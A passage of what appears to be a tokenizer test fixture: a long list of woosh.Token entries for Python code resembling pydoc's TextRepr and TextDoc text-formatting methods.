woosh.Token(woosh.NAME, 'self', 1131, 25, 1131, 29),
woosh.Token(woosh.OP, '.', 1131, 29, 1131, 30),
woosh.Token(woosh.NAME, 'maxother', 1131, 30, 1131, 38),
woosh.Token(woosh.OP, '=', 1131, 39, 1131, 40),
woosh.Token(woosh.NUMBER, '100', 1131, 41, 1131, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 1131, 44, 1132, 0),
woosh.Token(woosh.DEDENT, ' ', 1133, 0, 1133, 4),
woosh.Token(woosh.NAME, 'def', 1133, 4, 1133, 7),
woosh.Token(woosh.NAME, 'repr1', 1133, 8, 1133, 13),
woosh.Token(woosh.OP, '(', 1133, 13, 1133, 14),
woosh.Token(woosh.NAME, 'self', 1133, 14, 1133, 18),
woosh.Token(woosh.OP, ',', 1133, 18, 1133, 19),
woosh.Token(woosh.NAME, 'x', 1133, 20, 1133, 21),
woosh.Token(woosh.OP, ',', 1133, 21, 1133, 22),
woosh.Token(woosh.NAME, 'level', 1133, 23, 1133, 28),
woosh.Token(woosh.OP, ')', 1133, 28, 1133, 29),
woosh.Token(woosh.OP, ':', 1133, 29, 1133, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1133, 30, 1134, 0),
woosh.Token(woosh.INDENT, ' ', 1134, 0, 1134, 8),
woosh.Token(woosh.NAME, 'if', 1134, 8, 1134, 10),
woosh.Token(woosh.NAME, 'hasattr', 1134, 11, 1134, 18),
woosh.Token(woosh.OP, '(', 1134, 18, 1134, 19),
woosh.Token(woosh.NAME, 'type', 1134, 19, 1134, 23),
woosh.Token(woosh.OP, '(', 1134, 23, 1134, 24),
woosh.Token(woosh.NAME, 'x', 1134, 24, 1134, 25),
woosh.Token(woosh.OP, ')', 1134, 25, 1134, 26),
woosh.Token(woosh.OP, ',', 1134, 26, 1134, 27),
woosh.Token(woosh.STRING, "'__name__'", 1134, 28, 1134, 38),
woosh.Token(woosh.OP, ')', 1134, 38, 1134, 39),
woosh.Token(woosh.OP, ':', 1134, 39, 1134, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1134, 40, 1135, 0),
woosh.Token(woosh.INDENT, ' ', 1135, 0, 1135, 12),
woosh.Token(woosh.NAME, 'methodname', 1135, 12, 1135, 22),
woosh.Token(woosh.OP, '=', 1135, 23, 1135, 24),
woosh.Token(woosh.STRING, "'repr_'", 1135, 25, 1135, 32),
woosh.Token(woosh.OP, '+', 1135, 33, 1135, 34),
woosh.Token(woosh.STRING, "'_'", 1135, 35, 1135, 38),
woosh.Token(woosh.OP, '.', 1135, 38, 1135, 39),
woosh.Token(woosh.NAME, 'join', 1135, 39, 1135, 43),
woosh.Token(woosh.OP, '(', 1135, 43, 1135, 44),
woosh.Token(woosh.NAME, 'type', 1135, 44, 1135, 48),
woosh.Token(woosh.OP, '(', 1135, 48, 1135, 49),
woosh.Token(woosh.NAME, 'x', 1135, 49, 1135, 50),
woosh.Token(woosh.OP, ')', 1135, 50, 1135, 51),
woosh.Token(woosh.OP, '.', 1135, 51, 1135, 52),
woosh.Token(woosh.NAME, '__name__', 1135, 52, 1135, 60),
woosh.Token(woosh.OP, '.', 1135, 60, 1135, 61),
woosh.Token(woosh.NAME, 'split', 1135, 61, 1135, 66),
woosh.Token(woosh.OP, '(', 1135, 66, 1135, 67),
woosh.Token(woosh.OP, ')', 1135, 67, 1135, 68),
woosh.Token(woosh.OP, ')', 1135, 68, 1135, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1135, 69, 1136, 0),
woosh.Token(woosh.NAME, 'if', 1136, 12, 1136, 14),
woosh.Token(woosh.NAME, 'hasattr', 1136, 15, 1136, 22),
woosh.Token(woosh.OP, '(', 1136, 22, 1136, 23),
woosh.Token(woosh.NAME, 'self', 1136, 23, 1136, 27),
woosh.Token(woosh.OP, ',', 1136, 27, 1136, 28),
woosh.Token(woosh.NAME, 'methodname', 1136, 29, 1136, 39),
woosh.Token(woosh.OP, ')', 1136, 39, 1136, 40),
woosh.Token(woosh.OP, ':', 1136, 40, 1136, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1136, 41, 1137, 0),
woosh.Token(woosh.INDENT, ' ', 1137, 0, 1137, 16),
woosh.Token(woosh.NAME, 'return', 1137, 16, 1137, 22),
woosh.Token(woosh.NAME, 'getattr', 1137, 23, 1137, 30),
woosh.Token(woosh.OP, '(', 1137, 30, 1137, 31),
woosh.Token(woosh.NAME, 'self', 1137, 31, 1137, 35),
woosh.Token(woosh.OP, ',', 1137, 35, 1137, 36),
woosh.Token(woosh.NAME, 'methodname', 1137, 37, 1137, 47),
woosh.Token(woosh.OP, ')', 1137, 47, 1137, 48),
woosh.Token(woosh.OP, '(', 1137, 48, 1137, 49),
woosh.Token(woosh.NAME, 'x', 1137, 49, 1137, 50),
woosh.Token(woosh.OP, ',', 1137, 50, 1137, 51),
woosh.Token(woosh.NAME, 'level', 1137, 52, 1137, 57),
woosh.Token(woosh.OP, ')', 1137, 57, 1137, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 1137, 58, 1138, 0),
woosh.Token(woosh.DEDENT, ' ', 1138, 0, 1138, 8),
woosh.Token(woosh.DEDENT, '', 1138, 8, 1138, 8),
woosh.Token(woosh.NAME, 'return', 1138, 8, 1138, 14),
woosh.Token(woosh.NAME, 'cram', 1138, 15, 1138, 19),
woosh.Token(woosh.OP, '(', 1138, 19, 1138, 20),
woosh.Token(woosh.NAME, 'stripid', 1138, 20, 1138, 27),
woosh.Token(woosh.OP, '(', 1138, 27, 1138, 28),
woosh.Token(woosh.NAME, 'repr', 1138, 28, 1138, 32),
woosh.Token(woosh.OP, '(', 1138, 32, 1138, 33),
woosh.Token(woosh.NAME, 'x', 1138, 33, 1138, 34),
woosh.Token(woosh.OP, ')', 1138, 34, 1138, 35),
woosh.Token(woosh.OP, ')', 1138, 35, 1138, 36),
woosh.Token(woosh.OP, ',', 1138, 36, 1138, 37),
woosh.Token(woosh.NAME, 'self', 1138, 38, 1138, 42),
woosh.Token(woosh.OP, '.', 1138, 42, 1138, 43),
woosh.Token(woosh.NAME, 'maxother', 1138, 43, 1138, 51),
woosh.Token(woosh.OP, ')', 1138, 51, 1138, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1138, 52, 1139, 0),
woosh.Token(woosh.DEDENT, ' ', 1140, 0, 1140, 4),
woosh.Token(woosh.NAME, 'def', 1140, 4, 1140, 7),
woosh.Token(woosh.NAME, 'repr_string', 1140, 8, 1140, 19),
woosh.Token(woosh.OP, '(', 1140, 19, 1140, 20),
woosh.Token(woosh.NAME, 'self', 1140, 20, 1140, 24),
woosh.Token(woosh.OP, ',', 1140, 24, 1140, 25),
woosh.Token(woosh.NAME, 'x', 1140, 26, 1140, 27),
woosh.Token(woosh.OP, ',', 1140, 27, 1140, 28),
woosh.Token(woosh.NAME, 'level', 1140, 29, 1140, 34),
woosh.Token(woosh.OP, ')', 1140, 34, 1140, 35),
woosh.Token(woosh.OP, ':', 1140, 35, 1140, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1140, 36, 1141, 0),
woosh.Token(woosh.INDENT, ' ', 1141, 0, 1141, 8),
woosh.Token(woosh.NAME, 'test', 1141, 8, 1141, 12),
woosh.Token(woosh.OP, '=', 1141, 13, 1141, 14),
woosh.Token(woosh.NAME, 'cram', 1141, 15, 1141, 19),
woosh.Token(woosh.OP, '(', 1141, 19, 1141, 20),
woosh.Token(woosh.NAME, 'x', 1141, 20, 1141, 21),
woosh.Token(woosh.OP, ',', 1141, 21, 1141, 22),
woosh.Token(woosh.NAME, 'self', 1141, 23, 1141, 27),
woosh.Token(woosh.OP, '.', 1141, 27, 1141, 28),
woosh.Token(woosh.NAME, 'maxstring', 1141, 28, 1141, 37),
woosh.Token(woosh.OP, ')', 1141, 37, 1141, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1141, 38, 1142, 0),
woosh.Token(woosh.NAME, 'testrepr', 1142, 8, 1142, 16),
woosh.Token(woosh.OP, '=', 1142, 17, 1142, 18),
woosh.Token(woosh.NAME, 'repr', 1142, 19, 1142, 23),
woosh.Token(woosh.OP, '(', 1142, 23, 1142, 24),
woosh.Token(woosh.NAME, 'test', 1142, 24, 1142, 28),
woosh.Token(woosh.OP, ')', 1142, 28, 1142, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1142, 29, 1143, 0),
woosh.Token(woosh.NAME, 'if', 1143, 8, 1143, 10),
woosh.Token(woosh.STRING, "'\\\\'", 1143, 11, 1143, 15),
woosh.Token(woosh.NAME, 'in', 1143, 16, 1143, 18),
woosh.Token(woosh.NAME, 'test', 1143, 19, 1143, 23),
woosh.Token(woosh.NAME, 'and', 1143, 24, 1143, 27),
woosh.Token(woosh.STRING, "'\\\\'", 1143, 28, 1143, 32),
woosh.Token(woosh.NAME, 'not', 1143, 33, 1143, 36),
woosh.Token(woosh.NAME, 'in', 1143, 37, 1143, 39),
woosh.Token(woosh.NAME, 'replace', 1143, 40, 1143, 47),
woosh.Token(woosh.OP, '(', 1143, 47, 1143, 48),
woosh.Token(woosh.NAME, 'testrepr', 1143, 48, 1143, 56),
woosh.Token(woosh.OP, ',', 1143, 56, 1143, 57),
woosh.Token(woosh.STRING, "r'\\\\'", 1143, 58, 1143, 63),
woosh.Token(woosh.OP, ',', 1143, 63, 1143, 64),
woosh.Token(woosh.STRING, "''", 1143, 65, 1143, 67),
woosh.Token(woosh.OP, ')', 1143, 67, 1143, 68),
woosh.Token(woosh.OP, ':', 1143, 68, 1143, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1143, 69, 1144, 0),
woosh.Token(woosh.COMMENT, '# Backslashes are only literal in the string and are never', 1144, 12, 1144, 70),
woosh.Token(woosh.COMMENT, '# needed to make any special characters, so show a raw string.', 1145, 12, 1145, 74),
woosh.Token(woosh.INDENT, ' ', 1146, 0, 1146, 12),
woosh.Token(woosh.NAME, 'return', 1146, 12, 1146, 18),
woosh.Token(woosh.STRING, "'r'", 1146, 19, 1146, 22),
woosh.Token(woosh.OP, '+', 1146, 23, 1146, 24),
woosh.Token(woosh.NAME, 'testrepr', 1146, 25, 1146, 33),
woosh.Token(woosh.OP, '[', 1146, 33, 1146, 34),
woosh.Token(woosh.NUMBER, '0', 1146, 34, 1146, 35),
woosh.Token(woosh.OP, ']', 1146, 35, 1146, 36),
woosh.Token(woosh.OP, '+', 1146, 37, 1146, 38),
woosh.Token(woosh.NAME, 'test', 1146, 39, 1146, 43),
woosh.Token(woosh.OP, '+', 1146, 44, 1146, 45),
woosh.Token(woosh.NAME, 'testrepr', 1146, 46, 1146, 54),
woosh.Token(woosh.OP, '[', 1146, 54, 1146, 55),
woosh.Token(woosh.NUMBER, '0', 1146, 55, 1146, 56),
woosh.Token(woosh.OP, ']', 1146, 56, 1146, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1146, 57, 1147, 0),
woosh.Token(woosh.DEDENT, ' ', 1147, 0, 1147, 8),
woosh.Token(woosh.NAME, 'return', 1147, 8, 1147, 14),
woosh.Token(woosh.NAME, 'testrepr', 1147, 15, 1147, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1147, 23, 1148, 0),
woosh.Token(woosh.DEDENT, ' ', 1149, 0, 1149, 4),
woosh.Token(woosh.NAME, 'repr_str', 1149, 4, 1149, 12),
woosh.Token(woosh.OP, '=', 1149, 13, 1149, 14),
woosh.Token(woosh.NAME, 'repr_string', 1149, 15, 1149, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1149, 26, 1150, 0),
woosh.Token(woosh.NAME, 'def', 1151, 4, 1151, 7),
woosh.Token(woosh.NAME, 'repr_instance', 1151, 8, 1151, 21),
woosh.Token(woosh.OP, '(', 1151, 21, 1151, 22),
woosh.Token(woosh.NAME, 'self', 1151, 22, 1151, 26),
woosh.Token(woosh.OP, ',', 1151, 26, 1151, 27),
woosh.Token(woosh.NAME, 'x', 1151, 28, 1151, 29),
woosh.Token(woosh.OP, ',', 1151, 29, 1151, 30),
woosh.Token(woosh.NAME, 'level', 1151, 31, 1151, 36),
woosh.Token(woosh.OP, ')', 1151, 36, 1151, 37),
woosh.Token(woosh.OP, ':', 1151, 37, 1151, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1151, 38, 1152, 0),
woosh.Token(woosh.INDENT, ' ', 1152, 0, 1152, 8),
woosh.Token(woosh.NAME, 'try', 1152, 8, 1152, 11),
woosh.Token(woosh.OP, ':', 1152, 11, 1152, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1152, 12, 1153, 0),
woosh.Token(woosh.INDENT, ' ', 1153, 0, 1153, 12),
woosh.Token(woosh.NAME, 'return', 1153, 12, 1153, 18),
woosh.Token(woosh.NAME, 'cram', 1153, 19, 1153, 23),
woosh.Token(woosh.OP, '(', 1153, 23, 1153, 24),
woosh.Token(woosh.NAME, 'stripid', 1153, 24, 1153, 31),
woosh.Token(woosh.OP, '(', 1153, 31, 1153, 32),
woosh.Token(woosh.NAME, 'repr', 1153, 32, 1153, 36),
woosh.Token(woosh.OP, '(', 1153, 36, 1153, 37),
woosh.Token(woosh.NAME, 'x', 1153, 37, 1153, 38),
woosh.Token(woosh.OP, ')', 1153, 38, 1153, 39),
woosh.Token(woosh.OP, ')', 1153, 39, 1153, 40),
woosh.Token(woosh.OP, ',', 1153, 40, 1153, 41),
woosh.Token(woosh.NAME, 'self', 1153, 42, 1153, 46),
woosh.Token(woosh.OP, '.', 1153, 46, 1153, 47),
woosh.Token(woosh.NAME, 'maxstring', 1153, 47, 1153, 56),
woosh.Token(woosh.OP, ')', 1153, 56, 1153, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1153, 57, 1154, 0),
woosh.Token(woosh.DEDENT, ' ', 1154, 0, 1154, 8),
woosh.Token(woosh.NAME, 'except', 1154, 8, 1154, 14),
woosh.Token(woosh.OP, ':', 1154, 14, 1154, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1154, 15, 1155, 0),
woosh.Token(woosh.INDENT, ' ', 1155, 0, 1155, 12),
woosh.Token(woosh.NAME, 'return', 1155, 12, 1155, 18),
woosh.Token(woosh.STRING, "'<%s instance>'", 1155, 19, 1155, 34),
woosh.Token(woosh.OP, '%', 1155, 35, 1155, 36),
woosh.Token(woosh.NAME, 'x', 1155, 37, 1155, 38),
woosh.Token(woosh.OP, '.', 1155, 38, 1155, 39),
woosh.Token(woosh.NAME, '__class__', 1155, 39, 1155, 48),
woosh.Token(woosh.OP, '.', 1155, 48, 1155, 49),
woosh.Token(woosh.NAME, '__name__', 1155, 49, 1155, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1155, 57, 1156, 0),
woosh.Token(woosh.DEDENT, '', 1157, 0, 1157, 0),
woosh.Token(woosh.DEDENT, '', 1157, 0, 1157, 0),
woosh.Token(woosh.DEDENT, '', 1157, 0, 1157, 0),
woosh.Token(woosh.NAME, 'class', 1157, 0, 1157, 5),
woosh.Token(woosh.NAME, 'TextDoc', 1157, 6, 1157, 13),
woosh.Token(woosh.OP, '(', 1157, 13, 1157, 14),
woosh.Token(woosh.NAME, 'Doc', 1157, 14, 1157, 17),
woosh.Token(woosh.OP, ')', 1157, 17, 1157, 18),
woosh.Token(woosh.OP, ':', 1157, 18, 1157, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1157, 19, 1158, 0),
woosh.Token(woosh.INDENT, ' ', 1158, 0, 1158, 4),
woosh.Token(woosh.STRING, '"""Formatter class for text documentation."""', 1158, 4, 1158, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1158, 49, 1159, 0),
woosh.Token(woosh.COMMENT, '# ------------------------------------------- text formatting utilities', 1160, 4, 1160, 75),
woosh.Token(woosh.NAME, '_repr_instance', 1162, 4, 1162, 18),
woosh.Token(woosh.OP, '=', 1162, 19, 1162, 20),
woosh.Token(woosh.NAME, 'TextRepr', 1162, 21, 1162, 29),
woosh.Token(woosh.OP, '(', 1162, 29, 1162, 30),
woosh.Token(woosh.OP, ')', 1162, 30, 1162, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1162, 31, 1163, 0),
woosh.Token(woosh.NAME, 'repr', 1163, 4, 1163, 8),
woosh.Token(woosh.OP, '=', 1163, 9, 1163, 10),
woosh.Token(woosh.NAME, '_repr_instance', 1163, 11, 1163, 25),
woosh.Token(woosh.OP, '.', 1163, 25, 1163, 26),
woosh.Token(woosh.NAME, 'repr', 1163, 26, 1163, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1163, 30, 1164, 0),
woosh.Token(woosh.NAME, 'def', 1165, 4, 1165, 7),
woosh.Token(woosh.NAME, 'bold', 1165, 8, 1165, 12),
woosh.Token(woosh.OP, '(', 1165, 12, 1165, 13),
woosh.Token(woosh.NAME, 'self', 1165, 13, 1165, 17),
woosh.Token(woosh.OP, ',', 1165, 17, 1165, 18),
woosh.Token(woosh.NAME, 'text', 1165, 19, 1165, 23),
woosh.Token(woosh.OP, ')', 1165, 23, 1165, 24),
woosh.Token(woosh.OP, ':', 1165, 24, 1165, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1165, 25, 1166, 0),
woosh.Token(woosh.INDENT, ' ', 1166, 0, 1166, 8),
woosh.Token(woosh.STRING, '"""Format a string in bold by overstriking."""', 1166, 8, 1166, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1166, 54, 1167, 0),
woosh.Token(woosh.NAME, 'return', 1167, 8, 1167, 14),
woosh.Token(woosh.STRING, "''", 1167, 15, 1167, 17),
woosh.Token(woosh.OP, '.', 1167, 17, 1167, 18),
woosh.Token(woosh.NAME, 'join', 1167, 18, 1167, 22),
woosh.Token(woosh.OP, '(', 1167, 22, 1167, 23),
woosh.Token(woosh.NAME, 'ch', 1167, 23, 1167, 25),
woosh.Token(woosh.OP, '+', 1167, 26, 1167, 27),
woosh.Token(woosh.STRING, "'\\b'", 1167, 28, 1167, 32),
woosh.Token(woosh.OP, '+', 1167, 33, 1167, 34),
woosh.Token(woosh.NAME, 'ch', 1167, 35, 1167, 37),
woosh.Token(woosh.NAME, 'for', 1167, 38, 1167, 41),
woosh.Token(woosh.NAME, 'ch', 1167, 42, 1167, 44),
woosh.Token(woosh.NAME, 'in', 1167, 45, 1167, 47),
woosh.Token(woosh.NAME, 'text', 1167, 48, 1167, 52),
woosh.Token(woosh.OP, ')', 1167, 52, 1167, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1167, 53, 1168, 0),
woosh.Token(woosh.DEDENT, ' ', 1169, 0, 1169, 4),
woosh.Token(woosh.NAME, 'def', 1169, 4, 1169, 7),
woosh.Token(woosh.NAME, 'indent', 1169, 8, 1169, 14),
woosh.Token(woosh.OP, '(', 1169, 14, 1169, 15),
woosh.Token(woosh.NAME, 'self', 1169, 15, 1169, 19),
woosh.Token(woosh.OP, ',', 1169, 19, 1169, 20),
woosh.Token(woosh.NAME, 'text', 1169, 21, 1169, 25),
woosh.Token(woosh.OP, ',', 1169, 25, 1169, 26),
woosh.Token(woosh.NAME, 'prefix', 1169, 27, 1169, 33),
woosh.Token(woosh.OP, '=', 1169, 33, 1169, 34),
woosh.Token(woosh.STRING, "' '", 1169, 34, 1169, 40),
woosh.Token(woosh.OP, ')', 1169, 40, 1169, 41),
woosh.Token(woosh.OP, ':', 1169, 41, 1169, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1169, 42, 1170, 0),
woosh.Token(woosh.INDENT, ' ', 1170, 0, 1170, 8),
woosh.Token(woosh.STRING, '"""Indent text by prepending a given prefix to each line."""', 1170, 8, 1170, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 1170, 68, 1171, 0),
woosh.Token(woosh.NAME, 'if', 1171, 8, 1171, 10),
woosh.Token(woosh.NAME, 'not', 1171, 11, 1171, 14),
woosh.Token(woosh.NAME, 'text', 1171, 15, 1171, 19),
woosh.Token(woosh.OP, ':', 1171, 19, 1171, 20),
woosh.Token(woosh.NAME, 'return', 1171, 21, 1171, 27),
woosh.Token(woosh.STRING, "''", 1171, 28, 1171, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1171, 30, 1172, 0),
woosh.Token(woosh.NAME, 'lines', 1172, 8, 1172, 13),
woosh.Token(woosh.OP, '=', 1172, 14, 1172, 15),
woosh.Token(woosh.OP, '[', 1172, 16, 1172, 17),
woosh.Token(woosh.NAME, 'prefix', 1172, 17, 1172, 23),
woosh.Token(woosh.OP, '+', 1172, 24, 1172, 25),
woosh.Token(woosh.NAME, 'line', 1172, 26, 1172, 30),
woosh.Token(woosh.NAME, 'for', 1172, 31, 1172, 34),
woosh.Token(woosh.NAME, 'line', 1172, 35, 1172, 39),
woosh.Token(woosh.NAME, 'in', 1172, 40, 1172, 42),
woosh.Token(woosh.NAME, 'text', 1172, 43, 1172, 47),
woosh.Token(woosh.OP, '.', 1172, 47, 1172, 48),
woosh.Token(woosh.NAME, 'split', 1172, 48, 1172, 53),
woosh.Token(woosh.OP, '(', 1172, 53, 1172, 54),
woosh.Token(woosh.STRING, "'\\n'", 1172, 54, 1172, 58),
woosh.Token(woosh.OP, ')', 1172, 58, 1172, 59),
woosh.Token(woosh.OP, ']', 1172, 59, 1172, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1172, 60, 1173, 0),
woosh.Token(woosh.NAME, 'if', 1173, 8, 1173, 10),
woosh.Token(woosh.NAME, 'lines', 1173, 11, 1173, 16),
woosh.Token(woosh.OP, ':', 1173, 16, 1173, 17),
woosh.Token(woosh.NAME, 'lines', 1173, 18, 1173, 23),
woosh.Token(woosh.OP, '[', 1173, 23, 1173, 24),
woosh.Token(woosh.OP, '-', 1173, 24, 1173, 25),
woosh.Token(woosh.NUMBER, '1', 1173, 25, 1173, 26),
woosh.Token(woosh.OP, ']', 1173, 26, 1173, 27),
woosh.Token(woosh.OP, '=', 1173, 28, 1173, 29),
woosh.Token(woosh.NAME, 'lines', 1173, 30, 1173, 35),
woosh.Token(woosh.OP, '[', 1173, 35, 1173, 36),
woosh.Token(woosh.OP, '-', 1173, 36, 1173, 37),
woosh.Token(woosh.NUMBER, '1', 1173, 37, 1173, 38),
woosh.Token(woosh.OP, ']', 1173, 38, 1173, 39),
woosh.Token(woosh.OP, '.', 1173, 39, 1173, 40),
woosh.Token(woosh.NAME, 'rstrip', 1173, 40, 1173, 46),
woosh.Token(woosh.OP, '(', 1173, 46, 1173, 47),
woosh.Token(woosh.OP, ')', 1173, 47, 1173, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1173, 48, 1174, 0),
woosh.Token(woosh.NAME, 'return', 1174, 8, 1174, 14),
woosh.Token(woosh.STRING, "'\\n'", 1174, 15, 1174, 19),
woosh.Token(woosh.OP, '.', 1174, 19, 1174, 20),
woosh.Token(woosh.NAME, 'join', 1174, 20, 1174, 24),
woosh.Token(woosh.OP, '(', 1174, 24, 1174, 25),
woosh.Token(woosh.NAME, 'lines', 1174, 25, 1174, 30),
woosh.Token(woosh.OP, ')', 1174, 30, 1174, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1174, 31, 1175, 0),
woosh.Token(woosh.DEDENT, ' ', 1176, 0, 1176, 4),
woosh.Token(woosh.NAME, 'def', 1176, 4, 1176, 7),
woosh.Token(woosh.NAME, 'section', 1176, 8, 1176, 15),
woosh.Token(woosh.OP, '(', 1176, 15, 1176, 16),
woosh.Token(woosh.NAME, 'self', 1176, 16, 1176, 20),
woosh.Token(woosh.OP, ',', 1176, 20, 1176, 21),
woosh.Token(woosh.NAME, 'title', 1176, 22, 1176, 27),
woosh.Token(woosh.OP, ',', 1176, 27, 1176, 28),
woosh.Token(woosh.NAME, 'contents', 1176, 29, 1176, 37),
woosh.Token(woosh.OP, ')', 1176, 37, 1176, 38),
woosh.Token(woosh.OP, ':', 1176, 38, 1176, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1176, 39, 1177, 0),
woosh.Token(woosh.INDENT, ' ', 1177, 0, 1177, 8),
woosh.Token(woosh.STRING, '"""Format a section with a given heading."""', 1177, 8, 1177, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1177, 52, 1178, 0),
woosh.Token(woosh.NAME, 'clean_contents', 1178, 8, 1178, 22),
woosh.Token(woosh.OP, '=', 1178, 23, 1178, 24),
woosh.Token(woosh.NAME, 'self', 1178, 25, 1178, 29),
woosh.Token(woosh.OP, '.', 1178, 29, 1178, 30),
woosh.Token(woosh.NAME, 'indent', 1178, 30, 1178, 36),
woosh.Token(woosh.OP, '(', 1178, 36, 1178, 37),
woosh.Token(woosh.NAME, 'contents', 1178, 37, 1178, 45),
woosh.Token(woosh.OP, ')', 1178, 45, 1178, 46),
woosh.Token(woosh.OP, '.', 1178, 46, 1178, 47),
woosh.Token(woosh.NAME, 'rstrip', 1178, 47, 1178, 53),
woosh.Token(woosh.OP, '(', 1178, 53, 1178, 54),
woosh.Token(woosh.OP, ')', 1178, 54, 1178, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1178, 55, 1179, 0),
woosh.Token(woosh.NAME, 'return', 1179, 8, 1179, 14),
woosh.Token(woosh.NAME, 'self', 1179, 15, 1179, 19),
woosh.Token(woosh.OP, '.', 1179, 19, 1179, 20),
woosh.Token(woosh.NAME, 'bold', 1179, 20, 1179, 24),
woosh.Token(woosh.OP, '(', 1179, 24, 1179, 25),
woosh.Token(woosh.NAME, 'title', 1179, 25, 1179, 30),
woosh.Token(woosh.OP, ')', 1179, 30, 1179, 31),
woosh.Token(woosh.OP, '+', 1179, 32, 1179, 33),
woosh.Token(woosh.STRING, "'\\n'", 1179, 34, 1179, 38),
woosh.Token(woosh.OP, '+', 1179, 39, 1179, 40),
woosh.Token(woosh.NAME, 'clean_contents', 1179, 41, 1179, 55),
woosh.Token(woosh.OP, '+', 1179, 56, 1179, 57),
woosh.Token(woosh.STRING, "'\\n\\n'", 1179, 58, 1179, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1179, 64, 1180, 0),
woosh.Token(woosh.COMMENT, '# ---------------------------------------------- type-specific routines', 1181, 4, 1181, 75),
woosh.Token(woosh.DEDENT, ' ', 1183, 0, 1183, 4),
woosh.Token(woosh.NAME, 'def', 1183, 4, 1183, 7),
woosh.Token(woosh.NAME, 'formattree', 1183, 8, 1183, 18),
woosh.Token(woosh.OP, '(', 1183, 18, 1183, 19),
woosh.Token(woosh.NAME, 'self', 1183, 19, 1183, 23),
woosh.Token(woosh.OP, ',', 1183, 23, 1183, 24),
woosh.Token(woosh.NAME, 'tree', 1183, 25, 1183, 29),
woosh.Token(woosh.OP, ',', 1183, 29, 1183, 30),
woosh.Token(woosh.NAME, 'modname', 1183, 31, 1183, 38),
woosh.Token(woosh.OP, ',', 1183, 38, 1183, 39),
woosh.Token(woosh.NAME, 'parent', 1183, 40, 1183, 46),
woosh.Token(woosh.OP, '=', 1183, 46, 1183, 47),
woosh.Token(woosh.NAME, 'None', 1183, 47, 1183, 51),
woosh.Token(woosh.OP, ',', 1183, 51, 1183, 52),
woosh.Token(woosh.NAME, 'prefix', 1183, 53, 1183, 59),
woosh.Token(woosh.OP, '=', 1183, 59, 1183, 60),
woosh.Token(woosh.STRING, "''", 1183, 60, 1183, 62),
woosh.Token(woosh.OP, ')', 1183, 62, 1183, 63),
woosh.Token(woosh.OP, ':', 1183, 63, 1183, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1183, 64, 1184, 0),
woosh.Token(woosh.INDENT, ' ', 1184, 0, 1184, 8),
woosh.Token(woosh.STRING, '"""Render in text a class tree as returned by inspect.getclasstree()."""', 1184, 8, 1184, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 1184, 80, 1185, 0),
woosh.Token(woosh.NAME, 'result', 1185, 8, 1185, 14),
woosh.Token(woosh.OP, '=', 1185, 15, 1185, 16),
woosh.Token(woosh.STRING, "''", 1185, 17, 1185, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1185, 19, 1186, 0),
woosh.Token(woosh.NAME, 'for', 1186, 8, 1186, 11),
woosh.Token(woosh.NAME, 'entry', 1186, 12, 1186, 17),
woosh.Token(woosh.NAME, 'in', 1186, 18, 1186, 20),
woosh.Token(woosh.NAME, 'tree', 1186, 21, 1186, 25),
woosh.Token(woosh.OP, ':', 1186, 25, 1186, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1186, 26, 1187, 0),
woosh.Token(woosh.INDENT, ' ', 1187, 0, 1187, 12),
woosh.Token(woosh.NAME, 'if', 1187, 12, 1187, 14),
woosh.Token(woosh.NAME, 'type', 1187, 15, 1187, 19),
woosh.Token(woosh.OP, '(', 1187, 19, 1187, 20),
woosh.Token(woosh.NAME, 'entry', 1187, 20, 1187, 25),
woosh.Token(woosh.OP, ')', 1187, 25, 1187, 26),
woosh.Token(woosh.NAME, 'is', 1187, 27, 1187, 29),
woosh.Token(woosh.NAME, 'type', 1187, 30, 1187, 34),
woosh.Token(woosh.OP, '(', 1187, 34, 1187, 35),
woosh.Token(woosh.OP, '(', 1187, 35, 1187, 36),
woosh.Token(woosh.OP, ')', 1187, 36, 1187, 37),
woosh.Token(woosh.OP, ')', 1187, 37, 1187, 38),
woosh.Token(woosh.OP, ':', 1187, 38, 1187, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1187, 39, 1188, 0),
woosh.Token(woosh.INDENT, ' ', 1188, 0, 1188, 16),
woosh.Token(woosh.NAME, 'c', 1188, 16, 1188, 17),
woosh.Token(woosh.OP, ',', 1188, 17, 1188, 18),
woosh.Token(woosh.NAME, 'bases', 1188, 19, 1188, 24),
woosh.Token(woosh.OP, '=', 1188, 25, 1188, 26),
woosh.Token(woosh.NAME, 'entry', 1188, 27, 1188, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1188, 32, 1189, 0),
